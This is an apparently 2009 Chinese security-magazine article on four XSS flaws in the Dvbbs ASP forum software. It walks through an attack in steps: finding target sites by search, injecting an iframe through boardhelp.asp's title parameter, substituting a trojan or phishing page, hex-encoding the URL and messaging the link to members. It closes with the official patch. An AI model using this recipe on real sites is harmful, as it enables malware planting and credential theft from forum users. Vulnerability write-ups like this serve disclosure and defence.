动网连爆四个跨站漏洞

安全阵线

河北 张桂月 · 2009年6月15日 第23期

本期主角:动网论坛程序

问题所在:对输出变量未过滤

主要危害:用于挂马

调研时间:2009.6.1~2009.6.11

最近,动网论坛爆出四个跨站漏洞(影响8.0.0~8.2.0版本),这些漏洞可以被黑客用来进行挂马攻击或者网络钓鱼。

动网论坛是以ASP语言为基础的论坛中使用量最大的,可最近漏洞不断,在请求帮助页面被发现有跨站漏洞外,又在其他页面找到了同样的可以被利用的漏洞。利用这些漏洞,黑客可以轻易地在大量使用了动网论坛的网站中跨站挂马或者构造广告式钓鱼页面。可以说,黑客可以编织一张巨大的黑网。

访问了黑客提供的地址后(目前黑客发送地址主要是通过站内的短消息方式进行),就会激活网页木马,引来病毒。或者看到黑客构造的广告式钓鱼页面,点击后进入钓鱼陷阱。不管哪种方式,对用户使用的网银、网游等构成了严重的安全威胁。

安全小百科:要知道你经常登录的论坛是用的什么程序,可以在登录论坛的时候将页面拖到最下方,观察是否有一行“Powered By Dvbbs”(图1),如果你访问的论坛包含它,就表示这个论坛就是动网论坛。

23-f07-01.jpg

输出未过滤产生漏洞

这一次动网论坛爆出漏洞的页面非常多,总共有4个页面出现了问题,它们分别是show.asp、smiley.asp、boardhelp.asp和usersms.asp页面。出现问题的原因也非常相似,都是因为程序对输出的变量未过滤,导致了XSS跨站漏洞的出现。

例如在show.asp页面中,由于Request函数在传递filetype和username两个输出变量时未对它们过滤,因此黑客可以对这些没有过滤的变量加以利用,用来进行挂马和钓鱼。上述这些跨站漏洞的出现,应该是编写程序时疏忽导致的。

安全小百科:XSS也称为跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意HTML代码,当用户浏览该页之时,嵌入Web页面的HTML代码会被执行,从而达到攻击用户的目的。XSS属于被动式攻击,因为被动且不好利用,所以许多人常忽略了它的危害性。

XSS跨站漏洞就如同一个商场中没有保安和管理人员一样,在这样一个缺乏有效监管和审查的商场中,自然会有冒充商场人员的骗子混进来摆摊设点,而消费者会将这些骗子误认为是商场的内部员工,即便上当也认为自己是被商场骗了,而非外来的骗子所骗。

安全小百科:在ASP脚本语言中,可以使用 Request 对象访问任何基于 HTTP 请求传递的信息,包括从 HTML 表格用 POST 方法或 GET 方法传递的参数、Cookie 和用户认证。Request 对象能够访问客户端发送给服务器的二进制数据。

再现跨站攻击

第一步:在谷歌中输入“Powered By Dvbbs”寻找使用动网论坛的网站(图2),在搜索结果中挑选一个作为测试目标。以boardhelp.asp为例,它的XSS跨站激活方法是在boardhelp.asp页面后添加“?act=1&title=<iframe src=http://www.google.com></iframe>”。

23-f07-02.jpg

选定测试目标后,输入漏洞激活命令,例如在网址http://bbs.abc.com/dvbbs/后输入“boardhelp.asp?act=1&title=<iframe src=http://www.google.com></iframe>”,观察页面是否会出现谷歌页面。如果该论坛帮助页面出现了内嵌的谷歌页面(图3),则表明该论坛还没有打上补丁,可以继续下一步操作。

23-f07-03.jpg

第二步:将谷歌页面换成挂马页面,就完成了论坛挂马操作,挂马网页的制作请参考前几期的文章。利用该漏洞还可以进行网络钓鱼,这是该漏洞的主要利用方式之一。黑客会用Microsoft Expression Web或者Adobe Dreamweaver网页编辑程序创建一个550×650大小的广告式钓鱼页面。

将制作好的钓鱼页面上传到支持ASP服务的网站空间中。这个广告式钓鱼页面一般非常具有诱惑力,让人一看就产生点击的冲动,而不会去想它为什么出现在这里。如果用户点击了这个广告式钓鱼页面,就会进入下一个钓鱼页面。这个钓鱼页面才是真正起作用的,多是骗QQ、网游、网银等的用户名和密码。

第三步: 打开浏览器,进入http://tool.chinaz.com, 点击“代码转换工具”,选择“URL16进制加密”(图4),然后在需要加密的地址中输入伪装页面网址,例如“http://www.伪装页面地址.com/xxx.asp”,点击“加密”,将加密后的代码复制粘贴到“<iframe src=http://加密后的网址></iframe>”中。

23-f07-04.jpg

接下来将完整的代码http://www.abc.com/dvbbs/ boardhelp.asp?act=1&title=<iframe src=http:// %74%6F%6F%6C%2E%63%68%69%6E%61%7A%2E%63%6F%6D/ ></iframe> 通过论坛内部的短消息发送给论坛中的部分网友,然后坐等愿者上钩了(图5)。

23-f07-05.jpg

打上紧急补丁

防范XSS跨站攻击,最好的方法仍然是将漏洞补上,目前动网官方推出了紧急补丁,下载地址:http://bbs.dvbbs.net/dispbbs.asp?boardid=151&Id=1530985。普通读者在上网时,最好使用能拦截网页木马的安全辅助工具,避免被网页木马骚扰。此外,如果可能,可以选择能自动屏蔽跨站网址的浏览器(图6)。

23-f07-06.jpg